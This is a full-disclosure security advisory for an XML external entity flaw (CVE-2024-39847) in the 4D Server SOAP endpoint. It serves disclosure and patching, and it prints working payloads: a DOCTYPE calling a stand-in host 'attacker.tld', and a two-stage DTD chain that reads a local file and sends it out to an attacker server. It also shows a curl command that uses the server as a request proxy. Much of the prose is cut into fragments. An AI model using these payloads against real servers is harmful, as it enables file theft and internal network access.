VULNARCHIVE

SCHUTZWERK-SA-2024-002: Arbitrary File Read and Server Side Request Forgery via XML External Entities in 4D Server SOAP (CVE-2024-39847)

David Brown via Fulldisclosure ·

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512


SOAP
===============================================================================================


services.

Metadata
========

- - Affected product: 4D Server
- - Affected version: v20 R3
- - Vendor: 4D

- - CVE ID: CVE-2024-39847
- - CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-39847
- - CVSS 4.0 score: 8.7
- - Advisory URL: https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/

Details
=======


4D Server.



<!DOCTYPE foo [
 <!ENTITY % test SYSTEM "http://attacker.tld";>
 %test;
]>


"Reject SOAP-Requests" is set in the 4D Server GUI.


controlled server, and can be demonstrated using the following payloads:

Stage 1: XML body sent to the /4DSOAP endpoint

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % stage1 SYSTEM "http://192.168.56.1:2121/stage.dtd";>
  %stage1;
]>

Stage 2: DTD file returned by http://192.168.56.1:2121/stage.dtd

<!ENTITY % fileb SYSTEM "file:///c:\Users\john.doe\Desktop\secret.txt">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM '%fileb;'>">
%eval;
%exfiltrate;

Server response for the request sent to the /4DSOAP endpoint:

<?xml version="1.0" encoding="UTF-8" ?>

<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>

</faultstring>
        </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Requests sent to the attacker controlled server (192.168.56.1:2121):

192.168.56.114 - - "GET /stage.dtd HTTP/1.1" 200 -




<?xml version="1.0" encoding="UTF-8" ?>

<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>

- - http:/secret.tld/bar'
</faultstring>
        </SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


specific SOAP functions accepting data tags.


port 1337. Once started, files can be requested by issuing a GET request to

http://127.0.0.1:1337/<target URI>



$ curl '127.0.0.1:1337/http://192.168.56.114&apos;
<?xml version="1.0" encoding="UTF-8" ?>

<SOAP-ENV:Body>
        <SOAP-ENV:Fault>
                <faultcode>SOAP-ENV:Client</faultcode>


<html>
[...]
      <td class="grayborder">
        <h2 align="center">Welcome to your 4D Web Server default home
          page!</h2>
        <p align="center">This is the <strong><b>4D Web Server</b></strong>

          Application.</p>

          home page.</p>
        <p align="center">Instructions for configuring your 4D Web
          Server can be found in the included documentation.</p>

          All rights reserved.</p>
       </td>
[...]
</html>
'
</faultstring>
</SOAP-ENV:Fault>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>


perform "proxied" HTTP requests.

Risk
====


hash.

Solution/Mitigation
===================

Update to 4D Server 20 R7 or higher.

Timeline
========

- - 2024-06-17 Vulnerability discovered
- - 2024-06-24 Attempt to contact vendor, no response received
- - 2024-06-25 CVE ID requested
- - 2024-06-29 CVE-2024-39847 assigned
- - 2024-07-04 Attempt to contact vendor again, no response received
- - 2024-07-09 Attempt to contact vendor again, no response received
- - 2024-07-16 Attempt to contact vendor again, no response received
- - 2024-07-22 Attempt to contact vendor again, no response received
- - 2026-04-29 Advisory published

Credits
=======

The vulnerability was discovered by Marcelo Reyes of SCHUTZWERK GmbH.

Footnotes
=========

[0] https://4d.com
[1] https://www.schutzwerk.com/blog/schutzwerk-sa-2024-002/4d-xxe.py
[2] https://flask.palletsprojects.com/en/stable/
-----BEGIN PGP SIGNATURE-----

iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmnyGKIaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrs6TQ//Vp4Ts1sg8wUOx5V46ttU
OkErEUSrMqHDCrxiLKLsYoBBXyqPB+oKLzWFkMTUxbq+W7aqJIVG6EMeBsu1FCae
0JfGA0MYYJ4s7WcphN/QqqU+e35r0NfPAzcKlr861ZNcwcy9vbg/WP+z1AlTfH9X
MBKtv4Z2R1xpFq2sAJnwOw3E7Cl5g40PSsTJhI52/O7M4K5rB14EjFXW/hHgSFNz
ESUI+o/U1t7nPDulxfSsVmvbDTuvmxrs1xM/ulMYoKFKSueEglNCmF+5i/lFs7LF
rM0PZLGCbMR9z2NOeEk+dGwCztXpY2KN1KvPWYt4flvxZzlnWFWCzrVog8QdDhbV
CAfeLi+5krzgsZIPfphYpHc2BYJdAGsHDZx76GxoMNi8/miHX15+vg3N7SBPopOG
aIWnPJX0LCoecdzELJhzpOSYpzLTurRKnPU6y4sa/gJN4K99gCbE2HpPIJRaJmJG
hk7iwTUA11ijiEWpKCWX3hE3dhxY9WgKKoKe/CtGZkaEoEa1ePTPUFWhiwORpSsa
AV3i7YZOgjBiEj4ffBfy+Z/3fHhR7S3fWpFUhWeyb2jjx6OuJSG4g9az6Uze0hZG
vYn40CIpG2sHlm1PzQBzMUopqjmaW+FMyLgv8XOsnfdqg7UqPJ0LKmNAtafO1tVo
HH0qazSkyWNwZlaLr5YYUso=
=MhKk
-----END PGP SIGNATURE-----


--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX

Phone +49 731 977 191 0

advisories () schutzwerk com / www.schutzwerk.com

Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer

Amtsgericht Ulm /  HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/